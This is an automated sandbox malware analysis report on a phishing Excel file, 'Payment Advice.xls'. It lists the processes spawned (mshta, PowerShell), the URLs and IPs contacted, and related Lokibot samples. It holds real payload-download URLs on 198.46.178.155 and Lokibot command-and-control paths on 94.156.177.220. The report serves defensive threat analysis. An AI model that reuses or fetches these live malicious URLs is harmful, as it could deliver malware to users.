                                http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://acesso.run/j2AmN9?&cameo=misty&chador=orange&alto=dark&cloak=domineering&efficacy=deeply&primshta.exe, 0000000F.00000002.472711657.000000000038D000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.xls, A5330000.0.drfalse
                                  		unknown
                                  http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta%mshta.exe, 0000000F.00000003.466349057.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472711657.000000000039F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htaemshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://ocsp.entrust.net03mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htahmshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://contoso.com/Licensepowershell.exe, 00000005.00000002.449590100.0000000012141000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htaFimshta.exe, 00000004.00000002.427589487.00000000004BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://contoso.com/Iconpowershell.exe, 00000005.00000002.449590100.0000000012141000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta...mshta.exe, 0000000F.00000002.472967110.00000000032CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467578638.00000000032CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htaepC:mshta.exe, 0000000F.00000003.466349057.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472711657.000000000039F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://go.microspowershell.exe, 00000005.00000002.445010616.00000000034CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://198.46.178.155/422/seethepowershell.exe, 00000005.00000002.445010616.0000000002312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.483591075.0000000002561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://198.46.178.155/422/seethebestthingswithgoodthingsforgetmebackwithbestthings.tIFC:powershell.exe, 00000011.00000002.487554199.000000001A7AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htafC:mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htaNmshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htahttp://198.mshta.exe, 00000004.00000003.424720097.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467531580.0000000002CB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://198.46.178.155/422/seethebestthingswithgoodthingsforgetmebackwithbestthings.tIF.dllpowershell.exe, 00000005.00000002.444794603.0000000000393000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.481080162.000000000046F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htaCmshta.exe, 0000000F.00000003.466349057.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472711657.000000000039F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://198.46.178.155/mshta.exe, 00000004.00000002.428001171.0000000003B29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003B29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003B29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424405989.0000000003B29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003B29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472711657.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466349057.00000000003F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://contoso.com/powershell.exe, 00000005.00000002.449590100.0000000012141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.449590100.0000000012141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://198.46.178.155/AF59mshta.exe, 0000000F.00000002.472711657.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466349057.00000000003F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://drive.google.compowershell.exe, 0000000E.00000002.532800239.0000000002772000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539917275.00000000028A2000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      		unknown
                                                                      https://drive.usercontent.google.compowershell.exe, 0000000E.00000002.532800239.0000000002946000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539917275.0000000002A76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://198.46.178.155/422/seethebestthingswithgoodthingsforgetmebackwithbestthings.tIFppowershell.exe, 00000005.00000002.445010616.0000000002312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.483591075.0000000002561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta:mshta.exe, 00000004.00000002.427589487.00000000004BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://acesso.run/mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.427996527.0000000003AC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472967110.00000000032CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467578638.00000000032CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://ocsp.entrust.net0Dmshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htae6mshta.exe, 0000000F.00000003.466349057.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472711657.000000000039F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.445010616.0000000002111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.532800239.0000000002571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.483591075.0000000002051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539917275.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://secure.comodo.com/CPS0mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472967110.00000000032CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467578638.00000000032CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                172.67.162.95
                                                                                		acesso.runUnited States
                                                                                		13335CLOUDFLARENETUSfalse
                                                                                104.21.74.191
                                                                                		unknownUnited States
                                                                                		13335CLOUDFLARENETUSfalse
                                                                                94.156.177.220
                                                                                		unknownBulgaria
                                                                                		43561NET1-ASBGtrue
                                                                                142.250.184.206
                                                                                		drive.google.comUnited States
                                                                                		15169GOOGLEUSfalse
                                                                                198.46.178.155
                                                                                		unknownUnited States
                                                                                		36352AS-COLOCROSSINGUStrue
                                                                                142.250.185.97
                                                                                		drive.usercontent.google.comUnited States
                                                                                		15169GOOGLEUSfalse

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1544327
                                                                                Start date and time:2024-10-29 10:11:09 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 7m 28s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                Number of analysed new started processes analysed:31
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • GSI enabled (VBA)
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Sample name:Payment Advice.xls
                                                                                Detection:MAL
                                                                                Classification:mal100.phis.troj.spyw.expl.evad.winXLS@33/47@9/6
                                                                                EGA Information:
                                                                                • Successful, ratio: 33.3%
                                                                                HCA Information:
                                                                                • Successful, ratio: 100%
                                                                                • Number of executed functions: 11
                                                                                • Number of non-executed functions: 0
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .xls
                                                                                • Changed system and user locale, location and keyboard layout to French - France
                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                • Attach to Office via COM
                                                                                • Active ActiveX Object
                                                                                • Active ActiveX Object
                                                                                • Scroll down
                                                                                • Close Viewer

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                • Execution Graph export aborted for target mshta.exe, PID 2112 because there are no executed function
                                                                                • Execution Graph export aborted for target mshta.exe, PID 3656 because there are no executed function
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: Payment Advice.xls

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                05:12:29API Interceptor107x Sleep call for process: mshta.exe modified
                                                                                05:12:33API Interceptor951x Sleep call for process: powershell.exe modified
                                                                                05:12:43API Interceptor18x Sleep call for process: wscript.exe modified
                                                                                05:13:27API Interceptor331x Sleep call for process: CasPol.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                172.67.162.95Order-1351125X.docx.docGet hashmaliciousFormBookBrowse
                                                                                  2MbHBiqXH2.rtfGet hashmaliciousRedLineBrowse
                                                                                    Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                                                                                      Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                                                                                        Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                                                                                          PROFORMAXINVOICE.docx.docGet hashmaliciousLokibotBrowse
                                                                                            MV HTK Lavender.docGet hashmaliciousLokibotBrowse
                                                                                              PUO.docx.docGet hashmaliciousHTMLPhisherBrowse
                                                                                                336HB7m70J.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                  LIW_009.docx.docGet hashmaliciousFormBookBrowse
                                                                                                    104.21.74.191file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                    • tuong.me/wp-login.php
                                                                                                    94.156.177.220SecuriteInfo.com.Other.Malware-gen.29374.9055.xlsxGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                    • 94.156.177.220/simple/five/fre.php
                                                                                                    Statement Of Account.exeGet hashmaliciousLokibotBrowse
                                                                                                    • 94.156.177.220/skipo/five/fre.php
                                                                                                    Purchase order.xlsGet hashmaliciousLokibotBrowse
                                                                                                    • 94.156.177.220/simple/five/fre.php
                                                                                                    Payment Advice.xlsGet hashmaliciousLokibotBrowse
                                                                                                    • 94.156.177.220/logs/five/fre.php
                                                                                                    1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeGet hashmaliciousLokibotBrowse
                                                                                                    • 94.156.177.220/simple/five/fre.php
                                                                                                    SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxGet hashmaliciousLokibotBrowse
                                                                                                    • 94.156.177.220/simple/five/fre.php
                                                                                                    Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                                    • 94.156.177.220/logs/five/fre.php
                                                                                                    Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                                    • 94.156.177.220/logs/five/fre.php
                                                                                                    SOA October 24_1.docGet hashmaliciousLokibotBrowse
                                                                                                    • 94.156.177.220/skipo/five/fre.php
                                                                                                    17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exeGet hashmaliciousLokibotBrowse
                                                                                                    • 94.156.177.220/logs/five/fre.php

                                                                                                    Domains

                                                                                                    No context

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    CLOUDFLARENETUSBill Of Lading.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 188.114.97.3
                                                                                                    Bill_Of _Lading.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 172.67.74.152
                                                                                                    ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.97.3
                                                                                                    Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 1.1.1.1
                                                                                                    ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.97.3
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 188.114.96.3
                                                                                                    ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    Transferencia.docGet hashmaliciousQuasarBrowse
                                                                                                    • 188.114.96.3
                                                                                                    https://clairecarpenter.com/wp-includes/css/pbcmc.php?7112797967704b536932307466507a4373757943784b5463314a54533470796b784f7a456e567130725553383750315338317430677031416341#Email#Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.17.25.14
                                                                                                    AS-COLOCROSSINGUSST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                                    • 107.175.229.138
                                                                                                    ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                                    • 107.175.229.138
                                                                                                    ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                                    • 107.175.229.138
                                                                                                    la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 198.46.241.221
                                                                                                    la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 192.3.235.109
                                                                                                    Payment Advice.xlsGet hashmaliciousUnknownBrowse
                                                                                                    • 198.46.178.155
                                                                                                    SecuriteInfo.com.Other.Malware-gen.29374.9055.xlsxGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                    • 198.46.178.155
                                                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 107.175.113.214
                                                                                                    https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 198.23.159.37
                                                                                                    la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 192.210.198.196
                                                                                                    NET1-ASBGSecuriteInfo.com.Other.Malware-gen.29374.9055.xlsxGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                    • 94.156.177.220
                                                                                                    na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                    • 93.123.85.205
                                                                                                    na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                    • 93.123.85.205
                                                                                                    na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                    • 93.123.85.205
                                                                                                    na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                    • 93.123.85.205
                                                                                                    na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                    • 93.123.85.205
                                                                                                    na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                    • 93.123.85.205
                                                                                                    na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                    • 93.123.85.205
                                                                                                    na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                    • 93.123.85.205
                                                                                                    na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                    • 93.123.85.205
                                                                                                    CLOUDFLARENETUSBill Of Lading.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 188.114.97.3
                                                                                                    Bill_Of _Lading.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 172.67.74.152
                                                                                                    ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.97.3
                                                                                                    Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 1.1.1.1
                                                                                                    ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.97.3
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 188.114.96.3
                                                                                                    ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    Transferencia.docGet hashmaliciousQuasarBrowse
                                                                                                    • 188.114.96.3
                                                                                                    https://clairecarpenter.com/wp-includes/css/pbcmc.php?7112797967704b536932307466507a4373757943784b5463314a54533470796b784f7a456e567130725553383750315338317430677031416341#Email#Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.17.25.14

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    05af1f5ca1b87cc9cc9b25185115607dProforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 142.250.185.97
